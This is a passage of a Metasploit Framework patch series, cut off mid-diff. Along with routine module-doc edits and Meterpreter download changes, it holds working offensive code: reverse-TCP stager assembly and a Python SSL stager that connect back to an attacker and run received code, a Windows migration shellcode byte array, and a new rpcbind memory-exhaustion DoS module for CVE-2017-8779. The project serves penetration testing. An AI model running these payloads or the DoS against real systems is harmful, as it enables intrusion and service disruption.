b/documentation/modules/auxiliary/scanner/snmp/cambium_snmp_loot.md @@ -1,6 +1,8 @@ -Cambium devices (ePMP, PMP, Force, others) can be administered using SNMP. The device configuration contains IP addresses, keys, and passwords, amongst other information. This module uses SNMP to extract Cambium ePMP device configuration. On certain software versions, specific device configuration values can be accessed using SNMP RO string, even though only SNMP RW string should be able to access them, according to MIB documentation. +Cambium devices (ePMP, PMP, Force, others) can be administered using SNMP. The device configuration contains IP addresses, keys, and passwords, amongst other information. +This module uses SNMP to extract Cambium ePMP device configuration. On certain software versions, specific device configuration values can be accessed using SNMP RO string, even though only SNMP RW string should be able to access them, according to MIB documentation. -The module also triggers full configuration backup, and retrieves the backup url. The configuration file can then be downloaded without authentication. The module has been tested primarily on Cambium ePMP current version (3.2.x, as of today), PMP, and Force units. +The module also triggers full configuration backup, and retrieves the backup url. The configuration file can then be downloaded without authentication. +The module has been tested primarily on Cambium ePMP current version (3.2.x, as of today), PMP, and Force units. Note: If the backup url is not retrieved, it is recommended to increase the TIMEOUT and reduce the THREADS. Backup url can also be retrieved by quering the OID as follows: @@ -16,7 +18,7 @@ snmpget -v2c -c public 1.3.3.7 1.3.6.1.4.1.17713.21.6.4.13.0 3. Do: ```set RPORT [PORT]``` 4. Do: ```run``` -## Sample Output +## Scenarios ``` msf > use auxiliary/scanner/snmp/epmp_snmp_loot diff --git a/documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md b/documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md index ac392d61ae..d4d8f3d801 100755 --- a/documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md +++ b/documentation/modules/exploit/multi/browser/adobe_flash_hacking_team_uaf.md @@ -17,7 +17,7 @@ This module exploits an use after free on Adobe Flash Player. The vulnerability, 3. Do: ```set URIPATH / [PATH]``` 4. Do: ```run``` -## Sample Output +## Scenarios ### IE 11 and Flash 18.0.0.194 diff --git a/documentation/modules/exploit/multi/http/axis2_deployer.md b/documentation/modules/exploit/multi/http/axis2_deployer.md index ac68a1fcb6..f03e1fd59e 100755 --- a/documentation/modules/exploit/multi/http/axis2_deployer.md +++ b/documentation/modules/exploit/multi/http/axis2_deployer.md @@ -17,7 +17,7 @@ The Apache Axis2 Web application has three main sections:'Services' lists all th 4. Do: ```set PASSWORD [Password]``` 5. Do: ```run``` -## Sample Output +## Scenarios ``` msf > use exploit/multi/http/axis2_deployer @@ -57,6 +57,4 @@ Meterpreter : java/java meterpreter > exit [*] Shutting down Meterpreter... -[*] 10.10.155.37 - Meterpreter session 3 closed. Reason: User exit - ``` diff --git a/documentation/modules/exploit/multi/http/glassfish_deployer.md b/documentation/modules/exploit/multi/http/glassfish_deployer.md index 617f0edfc8..a0a3bf07d2 100644 --- a/documentation/modules/exploit/multi/http/glassfish_deployer.md +++ b/documentation/modules/exploit/multi/http/glassfish_deployer.md @@ -34,7 +34,7 @@ If you are on a different platform (such as Windows), the installation should be 4. Do: ```set PASSWORD [Password]``` 5. Do: ```run``` -## Sample Output +## Scenarios ``` msf > use exploit/multi/http/glassfish_deployer diff --git a/documentation/modules/exploit/multi/http/mediawiki_syntaxhighlight.md b/documentation/modules/exploit/multi/http/mediawiki_syntaxhighlight.md index 0bcc85970c..700dd3ba31 100644 --- a/documentation/modules/exploit/multi/http/mediawiki_syntaxhighlight.md +++ b/documentation/modules/exploit/multi/http/mediawiki_syntaxhighlight.md @@ -1,6 +1,7 @@ ## Vulnerable Application - Any MediaWiki installation with SyntaxHighlight version 2.0 installed & enabled. This extension ships with the AIO package of MediaWiki 1.27.x & 1.28.x. A fix for this issue is included in MediaWiki version 1.28.2 and version 1.27.3. + Any MediaWiki installation with SyntaxHighlight version 2.0 installed & enabled. This extension ships with the AIO package of MediaWiki 1.27.x & 1.28.x. + A fix for this issue is included in MediaWiki version 1.28.2 and version 1.27.3. ## Vulnerable Setup @@ -47,7 +48,7 @@ To set up the vulnerable environment, please do: In case the wiki is configured as private, a read-only (or better) account is needed to exploit this issue. Provide the password of that account here. -## Sample Output +## Scenarios ### The Check command diff --git a/documentation/modules/exploit/multi/http/rails_web_console_v2_code_exec.md b/documentation/modules/exploit/multi/http/rails_web_console_v2_code_exec.md index cac6edc4e2..e9702c0e83 100644 --- a/documentation/modules/exploit/multi/http/rails_web_console_v2_code_exec.md +++ b/documentation/modules/exploit/multi/http/rails_web_console_v2_code_exec.md @@ -1,6 +1,7 @@ ## Description - This module exploits an IP whitelist bypass vulnerability in the developer web console included with Ruby on Rails 4.0.x and 4.1.x. This module will also achieve code execution on Rails 4.2.x if the attack is launched from a whitelisted IP range. + This module exploits an IP whitelist bypass vulnerability in the developer web console included with Ruby on Rails 4.0.x and 4.1.x. + This module will also achieve code execution on Rails 4.2.x if the attack is launched from a whitelisted IP range. ## Verification Steps @@ -13,8 +14,6 @@ cd taco vim config/environments/development.rb ``` - - Add the following line just before the final `end` tag: ```config.web_console.whitelisted_ips = %w(0.0.0.0/0)``` @@ -38,7 +37,7 @@ sudo apt-get install nodejs 3. Do: ```set RPORT [Port]``` 4. Do: ```run``` -## Sample Output +## Scenarios ### Rails version 4.2.6 diff --git a/documentation/modules/exploit/windows/http/manageengine_connectionid_write.md b/documentation/modules/exploit/windows/http/manageengine_connectionid_write.md index 12f4641c6f..5690903d7d 100644 --- a/documentation/modules/exploit/windows/http/manageengine_connectionid_write.md +++ b/documentation/modules/exploit/windows/http/manageengine_connectionid_write.md @@ -1,6 +1,7 @@ ## Description -This module exploits a vulnerability found in ManageEngine Desktop Central 9. When uploading a 7z file, the FileUploadServlet class does not check the user-controlled ConnectionId parameter in the FileUploadServlet class. This allows a remote attacker to inject a null byte at the end of the value to create a malicious file with an arbitrary file type, and then place it under a directory that allows server-side scripts to run, which results in remote code execution under the context of SYSTEM. This exploit was successfully tested on version 9, build 90109 and build 91084. +This module exploits a vulnerability found in ManageEngine Desktop Central 9. When uploading a 7z file, the FileUploadServlet class does not check the user-controlled ConnectionId parameter in the FileUploadServlet class. This allows a remote attacker to inject a null byte at the end of the value to create a malicious file with an arbitrary file type, and then place it under a directory that allows server-side scripts to run, which results in remote code execution under the context of SYSTEM. +This exploit was successfully tested on version 9, build 90109 and build 91084. **NOTE:** By default, some ManageEngine Desktop Central versions run on port 8020, but older ones run on port 8040. Also, using this exploit will leave debugging information produced by FileUploadServlet in file `rdslog0.txt`. @@ -21,7 +22,7 @@ Desktop Central is integrated desktop and mobile device management software that 3. Do: ```check``` 4. Do: ```run``` -## Sample Output +## Scenarios ``` $ msfconsole diff --git a/documentation/modules/exploit/windows/http/serviio_checkstreamurl_cmd_exec.md b/documentation/modules/exploit/windows/http/serviio_checkstreamurl_cmd_exec.md index 9dedf7b430..b170d08d68 100644 --- a/documentation/modules/exploit/windows/http/serviio_checkstreamurl_cmd_exec.md +++ b/documentation/modules/exploit/windows/http/serviio_checkstreamurl_cmd_exec.md @@ -30,7 +30,7 @@ 4. Do: `run` 5. You should get a session -## Sample Output +## Scenarios ``` msf > use exploit/windows/http/serviio_checkstreamurl_cmd_exec diff --git a/documentation/modules/exploit/windows/iis/iis_webdav_upload_asp.md b/documentation/modules/exploit/windows/iis/iis_webdav_upload_asp.md index a90093995c..cc328a60ca 100755 --- a/documentation/modules/exploit/windows/iis/iis_webdav_upload_asp.md +++ b/documentation/modules/exploit/windows/iis/iis_webdav_upload_asp.md @@ -21,7 +21,7 @@ Web Distributed Authoring and Versioning (WebDAV) is an extension of the Hyperte 3. Do: ```set PATH / [PATH]``` 4. Do: ```run``` -## Sample Output +## Scenarios ``` msf > use exploit/windows/iis/iis_webdav_upload_asp From 4eb86cae99873750164ab61953eb9dcedbd10088 Mon Sep 17 00:00:00 2001 From: h00die Date: Wed, 31 May 2017 21:22:44 -0400 Subject: [PATCH 15/38] add L3 header for version under scenarios --- documentation/modules/module_doc_template.md | 2 ++ 1 file changed, 2 insertions(+) diff --git a/documentation/modules/module_doc_template.md b/documentation/modules/module_doc_template.md index a009033856..6dfc897dde 100644 --- a/documentation/modules/module_doc_template.md +++ b/documentation/modules/module_doc_template.md @@ -27,6 +27,8 @@ functioning in 5+ years, so giving links or specific examples can be VERY helpfu ## Scenarios +### Version of software and OS as applicable + Specific demo of using the module that might be useful in a real world scenario. ``` From cc0ff8f3dbd44e2a678b49161ec3c5f1404eeb67 Mon Sep 17 00:00:00 2001 From: OJ Date: Fri, 2 Jun 2017 17:16:58 +1000 Subject: [PATCH 16/38] Enable adaptive download with variable block sizes The aim of this commit is to allow users of Meterpreter in high-latency environments have better control over the behaviour of the download function. This code contains two new options that manage the block size of the downloads and the ability to set "adaptive" which means that the block size will adjust on the fly of things continue to fail. --- .../meterpreter/extensions/stdapi/fs/file.rb | 42 +++++++++++++++---- .../console/command_dispatcher/stdapi/fs.rb | 6 +++ 2 files changed, 40 insertions(+), 8 deletions(-) diff --git a/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb b/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb index 32eab353db..afe82e1bac 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/fs/file.rb @@ -7,6 +7,7 @@ require 'rex/post/meterpreter/extensions/stdapi/stdapi' require 'rex/post/meterpreter/extensions/stdapi/fs/io' require 'rex/post/meterpreter/extensions/stdapi/fs/file_stat' require 'fileutils' +require 'filesize' module Rex module Post @@ -25,6 +26,8 @@ class File < Rex::Post::Meterpreter::Extensions::Stdapi::Fs::IO include Rex::Post::File + MIN_BLOCK_SIZE = 1024 + class << self attr_accessor :client end @@ -312,7 +315,7 @@ class File < Rex::Post::Meterpreter::Extensions::Stdapi::Fs::IO dest += timestamp end - stat.call('downloading', src, dest) if (stat) + stat.call('Downloading', src, dest) if (stat) result = download_file(dest, src, opts, &stat) stat.call(result, src, dest) if (stat) } @@ -325,8 +328,11 @@ class File < Rex::Post::Meterpreter::Extensions::Stdapi::Fs::IO continue=false tries=false tries_no=0 + stat ||= lambda { } + if opts continue = true if opts["continue"] + adaptive = true if opts['adaptive'] tries = true if opts["tries"] tries_no = opts["tries_no"] end @@ -346,6 +352,8 @@ class File < Rex::Post::Meterpreter::Extensions::Stdapi::Fs::IO dir = ::File.dirname(dest_file) ::FileUtils.mkdir_p(dir) if dir and not ::File.directory?(dir) + src_size = Filesize.new(src_stat.size).pretty + if continue # continue downloading the file - skip downloaded part in the source dst_fd = ::File.new(dest_file, "ab") @@ -353,10 +361,10 @@ class File < Rex::Post::Meterpreter::Extensions::Stdapi::Fs::IO dst_fd.seek(0, ::IO::SEEK_END) in_pos = dst_fd.pos src_fd.seek(in_pos) - stat.call('continuing from ', in_pos, src_file) if (stat) + stat.call("Continuing from #{Filesize.new(in_pos).pretty} of #{src_size}", src_file, dest_file) rescue # if we can't seek, download again - stat.call('error continuing - downloading from scratch', src_file, dest_file) if (stat) + stat.call('Error continuing - downloading from scratch', src_file, dest_file) dst_fd.close dst_fd = ::File.new(dest_file, "wb") end @@ -365,10 +373,12 @@ class File < Rex::Post::Meterpreter::Extensions::Stdapi::Fs::IO end # Keep transferring until EOF is reached... + block_size = opts['block_size'] || 1024 * 1024 begin if tries # resume when timeouts encountered seek_back = false + adjust_block = false tries_cnt = 0 begin # while begin # exception @@ -376,30 +386,46 @@ class File < Rex::Post::Meterpreter::Extensions::Stdapi::Fs::IO in_pos = dst_fd.pos src_fd.seek(in_pos) seek_back = false - stat.call('resuming at ', in_pos, src_file) if (stat) + stat.call("Resuming at #{Filesize.new(in_pos).pretty} of #{src_size}", src_file, dest_file) else # succesfully read and wrote - reset the counter tries_cnt = 0 end - data = src_fd.read + adjust_block = true + data = src_fd.read(block_size) + adjust_block = false rescue Rex::TimeoutError # timeout encountered - either seek back and retry or quit if (tries && (tries_no == 0 || tries_cnt < tries_no)) tries_cnt += 1 seek_back = true - stat.call('error downloading - retry #', tries_cnt, src_file) if (stat) + # try a smaller block size for the next round + if adaptive && adjust_block + block_size = [block_size >> 1, MIN_BLOCK_SIZE].max + adjust_block = false + msg = "Error downloading, block size set to #{block_size} - retry # #{tries_cnt}" + stat.call(msg, src_file, dest_file) + else + stat.call("Error downloading - retry # #{tries_cnt}", src_file, dest_file) + end retry else - stat.call('error downloading - giving up', src_file, dest_file) if (stat) + stat.call('Error downloading - giving up', src_file, dest_file) raise end end dst_fd.write(data) if (data != nil) + percent = dst_fd.pos.to_f / src_stat.size.to_f * 100.0 + msg = "Downloaded #{Filesize.new(dst_fd.pos).pretty} of #{src_size} (#{percent.round(2)}%)" + stat.call(msg, src_file, dest_file) end while (data != nil) else # do the simple copying quiting on the first error - while ((data = src_fd.read) != nil) + while ((data = src_fd.read(block_size)) != nil) dst_fd.write(data) + percent = dst_fd.pos.to_f / src_stat.size.to_f * 100.0 + msg = "Downloaded #{Filesize.new(dst_fd.pos).pretty} of #{src_size} (#{percent.round(2)}%)" + stat.call(msg, src_file, dest_file) end end rescue EOFError diff --git a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/fs.rb b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/fs.rb index 508d4820ea..fa855b7fcb 100644 --- a/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/fs.rb +++ b/lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/fs.rb @@ -28,6 +28,8 @@ class Console::CommandDispatcher::Stdapi::Fs @@download_opts = Rex::Parser::Arguments.new( "-h" => [ false, "Help banner." ], "-c" => [ false, "Resume getting a partially-downloaded file." ], + "-a" => [ false, "Enable adaptive download buffer size." ], + "-b" => [ true, "Set the initial block size for the download." ], "-l" => [ true, "Set the limit of retries (0 unlimits)." ], "-r" => [ false, "Download recursively." ], "-t" => [ false, "Timestamp downloaded files." ]) @@ -382,6 +384,10 @@ class Console::CommandDispatcher::Stdapi::Fs @@download_opts.parse(args) { |opt, idx, val| case opt + when "-a" + opts['adaptive'] = true + when "-b" + opts['block_size'] = val.to_i when "-r" recursive = true opts['recursive'] = true From 82a83af6c2647193f70e253979691c5d46bf7353 Mon Sep 17 00:00:00 2001 From: tkmru Date: Sat, 3 Jun 2017 04:04:17 +0900 Subject: [PATCH 17/38] add error handling to x86 linux reverse tcp --- lib/msf/core/payload/linux/reverse_tcp.rb | 85 +++++++++++++---------- 1 file changed, 48 insertions(+), 37 deletions(-) diff --git a/lib/msf/core/payload/linux/reverse_tcp.rb b/lib/msf/core/payload/linux/reverse_tcp.rb index 89e37a8c44..07e8b9354c 100644 --- a/lib/msf/core/payload/linux/reverse_tcp.rb +++ b/lib/msf/core/payload/linux/reverse_tcp.rb @@ -91,49 +91,61 @@ module Payload::Linux::ReverseTcp encoded_host = "0x%.8x" % Rex::Socket.addr_aton(opts[:host]||"127.127.127.127").unpack("V").first asm = %Q^ - xor ebx, ebx - mul ebx - push ebx - inc ebx - push ebx - push 0x2 - mov al, 0x66 - mov ecx, esp - int 0x80 ; sys_socketcall (socket()) + xor ebx, ebx + mul ebx + push ebx + inc ebx + push ebx + push 0x2 + mov al, 0x66 + mov ecx, esp + int 0x80 ; sys_socketcall (socket()) + test eax, eax + js failed - xchg eax, edi ; store the socket in edi - pop ebx ; set ebx back to zero - push #{encoded_host} - push #{encoded_port} - mov ecx, esp - push 0x66 - pop eax - push eax - push ecx - push edi - mov ecx, esp - inc ebx - int 0x80 ; sys_socketcall (connect()) + xchg eax, edi ; store the socket in edi + pop ebx ; set ebx back to zero + push #{encoded_host} + push #{encoded_port} + mov ecx, esp + push 0x66 + pop eax + push eax + push ecx + push edi + mov ecx, esp + inc ebx + int 0x80 ; sys_socketcall (connect()) + test eax, eax + js failed ^ asm << asm_send_uuid if include_send_uuid asm << %Q^ - mov dl, 0x7 - mov ecx, 0x1000 - mov ebx, esp - shr ebx, 0xc - shl ebx, 0xc - mov al, 0x7d - int 0x80 ; sys_mprotect + mov dl, 0x7 + mov ecx, 0x1000 + mov ebx, esp + shr ebx, 0xc + shl ebx, 0xc + mov al, 0x7d + int 0x80 ; sys_mprotect + test eax, eax + js failed - pop ebx - mov ecx, esp - cdq - mov dh, 0xc - mov al, 0x3 - int 0x80 ; sys_read (recv()) - jmp ecx + pop ebx + mov ecx, esp + cdq + mov dh, 0xc + mov al, 0x3 + int 0x80 ; sys_read (recv()) + test eax, eax + js failed + jmp ecx + failed: + mov eax, 0x1 + mov ebx, 0x1 ; set exit status to 1 + int 0x80 ; sys_exit ^ asm @@ -142,4 +154,3 @@ module Payload::Linux::ReverseTcp end end - From e175bcda08b430db413a13d65f4436a0a1d196cf Mon Sep 17 00:00:00 2001 From: tkmru Date: Sat, 3 Jun 2017 08:37:18 +0900 Subject: [PATCH 18/38] update cachedSize --- modules/payloads/stagers/linux/x86/reverse_tcp.rb | 2 +- modules/payloads/stagers/linux/x86/reverse_tcp_uuid.rb | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/payloads/stagers/linux/x86/reverse_tcp.rb b/modules/payloads/stagers/linux/x86/reverse_tcp.rb index 1eb84c5fa6..655f7f4ec9 100644 --- a/modules/payloads/stagers/linux/x86/reverse_tcp.rb +++ b/modules/payloads/stagers/linux/x86/reverse_tcp.rb @@ -9,7 +9,7 @@ require 'msf/core/payload/linux/reverse_tcp' module MetasploitModule - CachedSize = 71 + CachedSize = 99 include Msf::Payload::Stager include Msf::Payload::Linux::ReverseTcp diff --git a/modules/payloads/stagers/linux/x86/reverse_tcp_uuid.rb b/modules/payloads/stagers/linux/x86/reverse_tcp_uuid.rb index 8dc5b59c43..65fe538a80 100644 --- a/modules/payloads/stagers/linux/x86/reverse_tcp_uuid.rb +++ b/modules/payloads/stagers/linux/x86/reverse_tcp_uuid.rb @@ -9,7 +9,7 @@ require 'msf/core/payload/linux/reverse_tcp' module MetasploitModule - CachedSize = 114 + CachedSize = 142 include Msf::Payload::Stager include Msf::Payload::Linux::ReverseTcp From ca5b20f4d0243cb8c94e36a2cc3776bbcdada339 Mon Sep 17 00:00:00 2001 From: RaMMicHaeL Date: Sat, 3 Jun 2017 11:30:11 +0300 Subject: [PATCH 19/38] Fixed an elusive bug on AMD CPUs Details: http://blog.rewolf.pl/blog/?p=1484 rwfpl/rewolf-wow64ext@8771485 --- external/source/vncdll/vncdll/inject.c | 11 +++++++---- 1 file changed, 7 insertions(+), 4 deletions(-) diff --git a/external/source/vncdll/vncdll/inject.c b/external/source/vncdll/vncdll/inject.c index 3414584dc6..fc3ea273f5 100755 --- a/external/source/vncdll/vncdll/inject.c +++ b/external/source/vncdll/vncdll/inject.c @@ -12,11 +12,14 @@ #endif // see '/msf3/external/source/shellcode/x86/migrate/executex64.asm' +// 03.06.2017: fixed an elusive bug on AMD CPUs, http://blog.rewolf.pl/blog/?p=1484 +// found and fixed by ReWolf, incorporated by RaMMicHaeL BYTE migrate_executex64[] = "\x55\x89\xE5\x56\x57\x8B\x75\x08\x8B\x4D\x0C\xE8\x00\x00\x00\x00" - "\x58\x83\xC0\x25\x83\xEC\x08\x89\xE2\xC7\x42\x04\x33\x00\x00\x00" - "\x89\x02\xE8\x09\x00\x00\x00\x83\xC4\x14\x5F\x5E\x5D\xC2\x08\x00" - "\x8B\x3C\x24\xFF\x2A\x48\x31\xC0\x57\xFF\xD6\x5F\x50\xC7\x44\x24" - "\x04\x23\x00\x00\x00\x89\x3C\x24\xFF\x2C\x24"; + "\x58\x83\xC0\x2B\x83\xEC\x08\x89\xE2\xC7\x42\x04\x33\x00\x00\x00" + "\x89\x02\xE8\x0F\x00\x00\x00\x66\x8C\xD8\x66\x8E\xD0\x83\xC4\x14" + "\x5F\x5E\x5D\xC2\x08\x00\x8B\x3C\xE4\xFF\x2A\x48\x31\xC0\x57\xFF" + "\xD6\x5F\x50\xC7\x44\x24\x04\x23\x00\x00\x00\x89\x3C\x24\xFF\x2C" + "\x24"; // see '/msf3/external/source/shellcode/x64/migrate/remotethread.asm' BYTE migrate_wownativex[] = "\xFC\x48\x89\xCE\x48\x89\xE7\x48\x83\xE4\xF0\xE8\xC8\x00\x00\x00" From 39cee481c1203593a6fbce7b2ff3f41628a77943 Mon Sep 17 00:00:00 2001 From: itsmeroy2012 Date: Sat, 3 Jun 2017 22:57:59 +0530 Subject: [PATCH 20/38] Making changes similar to the reverse_tcp payload --- .../core/payload/python/reverse_tcp_ssl.rb | 24 +++++++++++++++---- .../stagers/python/reverse_tcp_ssl.rb | 2 +- 2 files changed, 20 insertions(+), 6 deletions(-) diff --git a/lib/msf/core/payload/python/reverse_tcp_ssl.rb b/lib/msf/core/payload/python/reverse_tcp_ssl.rb index cc11aaf135..6873728a86 100644 --- a/lib/msf/core/payload/python/reverse_tcp_ssl.rb +++ b/lib/msf/core/payload/python/reverse_tcp_ssl.rb @@ -15,6 +15,15 @@ module Payload::Python::ReverseTcpSsl include Msf::Payload::Python include Msf::Payload::Python::ReverseTcp + def initialize(*args) + super + register_advanced_options([ + OptInt.new('StagerRetryCount', [false, 'The number of times the stager should retry if the first connect fails (zero to infinite retries)', 10]), + OptInt.new('StagerRetryWait', [false, 'Number of seconds to wait for the stager between reconnect attempts',5]) + ], self.class) + end + + # # Generate the first stage @@ -23,7 +32,8 @@ module Payload::Python::ReverseTcpSsl conf = { port: datastore['LPORT'], host: datastore['LHOST'], - retry_wait: datastore['StagerRetryWait'] + retry_count: datastore['StagerRetryCount'], + retry_wait: datastore['StagerRetryWait'], } generate_reverse_tcp_ssl(conf) @@ -44,22 +54,26 @@ module Payload::Python::ReverseTcpSsl def generate_reverse_tcp_ssl(opts={}) # Set up the socket cmd = "import ssl,socket,struct#{datastore['StagerRetryWait'].to_i > 0 ? ',time' : ''}\n" - if datastore['StagerRetryWait'].blank? # do not retry at all (old style) + if opts[:retry_wait].blank? # do not retry at all (old style) cmd << "so=socket.socket(2,1)\n" # socket.AF_INET = 2 cmd << "so.connect(('#{opts[:host]}',#{opts[:port]}))\n" cmd << "s=ssl.wrap_socket(so)\n" else - cmd << "while 1:\n" + if opts[:retry_count]>0 + cmd << "for x in range(#{opts[:retry_count].to_i}):\n" + else + cmd << "while 1:\n" + end cmd << "\ttry:\n" cmd << "\t\tso=socket.socket(2,1)\n" # socket.AF_INET = 2 cmd << "\t\tso.connect(('#{opts[:host]}',#{opts[:port]}))\n" cmd << "\t\ts=ssl.wrap_socket(so)\n" cmd << "\t\tbreak\n" cmd << "\texcept:\n" - if datastore['StagerRetryWait'].to_i <= 0 + if opts[:retry_wait].to_i <= 0 cmd << "\t\tpass\n" # retry immediately else - cmd << "\t\ttime.sleep(#{datastore['StagerRetryWait'].to_i})\n" # retry after waiting + cmd << "\t\ttime.sleep(#{opts[:retry_wait]})\n" # retry after waiting end end cmd << py_send_uuid if include_send_uuid diff --git a/modules/payloads/stagers/python/reverse_tcp_ssl.rb b/modules/payloads/stagers/python/reverse_tcp_ssl.rb index d564bec8cb..b2b94fe748 100644 --- a/modules/payloads/stagers/python/reverse_tcp_ssl.rb +++ b/modules/payloads/stagers/python/reverse_tcp_ssl.rb @@ -9,7 +9,7 @@ require 'msf/core/payload/python/reverse_tcp_ssl' module MetasploitModule - CachedSize = 378 + CachedSize = 470 include Msf::Payload::Stager include Msf::Payload::Python::ReverseTcpSsl From 737f7452ced9e133f4311b761ba2d99eef0033f3 Mon Sep 17 00:00:00 2001 From: tkmru Date: Sun, 4 Jun 2017 04:42:45 +0900 Subject: [PATCH 21/38] add my name to author --- modules/payloads/stagers/linux/x86/reverse_tcp.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/payloads/stagers/linux/x86/reverse_tcp.rb b/modules/payloads/stagers/linux/x86/reverse_tcp.rb index 655f7f4ec9..89fbded574 100644 --- a/modules/payloads/stagers/linux/x86/reverse_tcp.rb +++ b/modules/payloads/stagers/linux/x86/reverse_tcp.rb @@ -18,7 +18,7 @@ module MetasploitModule super(merge_info(info, 'Name' => 'Reverse TCP Stager', 'Description' => 'Connect back to the attacker', - 'Author' => [ 'skape', 'egypt' ], + 'Author' => [ 'skape', 'egypt', 'tkmru' ], 'License' => MSF_LICENSE, 'Platform' => 'linux', 'Arch' => ARCH_X86, From f17b28930dd926b93915a115f1117825f4c594db Mon Sep 17 00:00:00 2001 From: RaMMicHaeL Date: Sun, 4 Jun 2017 13:18:50 +0300 Subject: [PATCH 22/38] Update executex64.asm --- .../source/shellcode/windows/x86/src/migrate/executex64.asm | 3 +++ 1 file changed, 3 insertions(+) diff --git a/external/source/shellcode/windows/x86/src/migrate/executex64.asm b/external/source/shellcode/windows/x86/src/migrate/executex64.asm index a3f2777fde..e4af580fe0 100644 --- a/external/source/shellcode/windows/x86/src/migrate/executex64.asm +++ b/external/source/shellcode/windows/x86/src/migrate/executex64.asm @@ -40,6 +40,9 @@ delta: call go_all_native ; perform the transition into native x64 and return here when done. + mov ax, ds ; fixes an elusive bug on AMD CPUs, http://blog.rewolf.pl/blog/?p=1484 + mov ss, ax ; found and fixed by ReWolf, incorporated by RaMMicHaeL + add esp, (8+4+8) ; remove the 8 bytes we allocated + the return address which was never popped off + the qword pushed from native_x64 pop edi ; restore the clobbered registers pop esi ; From 5f10e63923532293f68279e99cfff567c40caea2 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Mon, 5 Jun 2017 08:43:16 -0500 Subject: [PATCH 23/38] bump payloads --- Gemfile.lock | 4 ++-- metasploit-framework.gemspec | 2 +- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index 3907842107..ab6ce112f1 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -15,7 +15,7 @@ PATH metasploit-concern metasploit-credential metasploit-model - metasploit-payloads (= 1.2.29) + metasploit-payloads (= 1.2.32) metasploit_data_models metasploit_payloads-mettle (= 0.1.9) msgpack @@ -195,7 +195,7 @@ GEM activemodel (~> 4.2.6) activesupport (~> 4.2.6) railties (~> 4.2.6) - metasploit-payloads (1.2.29) + metasploit-payloads (1.2.32) metasploit_data_models (2.0.14) activerecord (~> 4.2.6) activesupport (~> 4.2.6) diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index 5670325907..f4133668e0 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec @@ -68,7 +68,7 @@ Gem::Specification.new do |spec| # are needed when there's no database spec.add_runtime_dependency 'metasploit-model' # Needed for Meterpreter - spec.add_runtime_dependency 'metasploit-payloads', '1.2.29' + spec.add_runtime_dependency 'metasploit-payloads', '1.2.32' # Needed for the next-generation POSIX Meterpreter spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.1.9' # Needed by msfgui and other rpc components From a571834c4d09997c719174977c199e79ee5c38d2 Mon Sep 17 00:00:00 2001 From: Pearce Barry Date: Mon, 5 Jun 2017 10:23:39 -0500 Subject: [PATCH 24/38] Initial commit of rpcbomb DoS aux module. This just brings the code in as-in, next step is to update to use our mixins and such. --- modules/auxiliary/dos/rpc/rpcbomb.rb | 72 ++++++++++++++++++++++++++++ 1 file changed, 72 insertions(+) create mode 100644 modules/auxiliary/dos/rpc/rpcbomb.rb diff --git a/modules/auxiliary/dos/rpc/rpcbomb.rb b/modules/auxiliary/dos/rpc/rpcbomb.rb new file mode 100644 index 0000000000..8f8c50647f --- /dev/null +++ b/modules/auxiliary/dos/rpc/rpcbomb.rb @@ -0,0 +1,72 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class MetasploitModule < Msf::Auxiliary + + include Msf::Auxiliary::Dos + # include Exploit::Remote::Udp + + def initialize(info={}) + super(update_info(info, + 'Name' => 'RPC DoS targeting *nix rpcbind/libtirpc', + 'Description' => %q{ + This module XXX. + }, + 'Author' => + [ + 'guidovranken', # original code + 'Pearce Barry ' # Metasploit module + ], + 'License' => MSF_LICENSE, + 'References' => [ + [ 'CVE', '2017-8779' ], + [ 'BID', '98325' ], + [ 'URL', 'http://openwall.com/lists/oss-security/2017/05/03/12' ] + ], + 'Disclosure Date' => 'May 03 2017')) + + register_options([ + Opt::RPORT(111), + OptAddress.new('RHOST', [true, 'RPC server target']), + OptInt.new('ALLOCSIZE', [true, 'Number of bytes to allocate']) + ]) + end + + + + def run + require 'socket' + + pkt = [0].pack('N') # xid + pkt << [0].pack('N') # message type CALL + pkt << [2].pack('N') # RPC version 2 + pkt << [100000].pack('N') # Program + pkt << [4].pack('N') # Program version + pkt << [9].pack('N') # Procedure + pkt << [0].pack('N') # Credentials AUTH_NULL + pkt << [0].pack('N') # Credentials length 0 + pkt << [0].pack('N') # Credentials AUTH_NULL + pkt << [0].pack('N') # Credentials length 0 + pkt << [0].pack('N') # Program: 0 + pkt << [0].pack('N') # Ver + pkt << [4].pack('N') # Proc + pkt << [4].pack('N') # Argument length + pkt << [datastore['ALLOCSIZE']].pack('N') # Payload + + s = UDPSocket.new + s.send(pkt, 0, datastore['RHOST'], datastore['RPORT']) + + sleep 1.5 + + begin + s.recvfrom_nonblock(9000) + rescue + print_error("No response from server received.") + return + end + + print_good("Allocated #{datastore['ALLOCSIZE']} bytes at host #{datastore['RHOST']}:#{datastore['RPORT']}") + end +end From 8c39c92245b1b1136bf3be420263872ebc4a2060 Mon Sep 17 00:00:00 2001 From: Pearce Barry Date: Mon, 5 Jun 2017 11:27:13 -0500 Subject: [PATCH 25/38] Add description and loop capability. --- modules/auxiliary/dos/rpc/rpcbomb.rb | 16 ++++++++++++---- 1 file changed, 12 insertions(+), 4 deletions(-) diff --git a/modules/auxiliary/dos/rpc/rpcbomb.rb b/modules/auxiliary/dos/rpc/rpcbomb.rb index 8f8c50647f..b08bab58b5 100644 --- a/modules/auxiliary/dos/rpc/rpcbomb.rb +++ 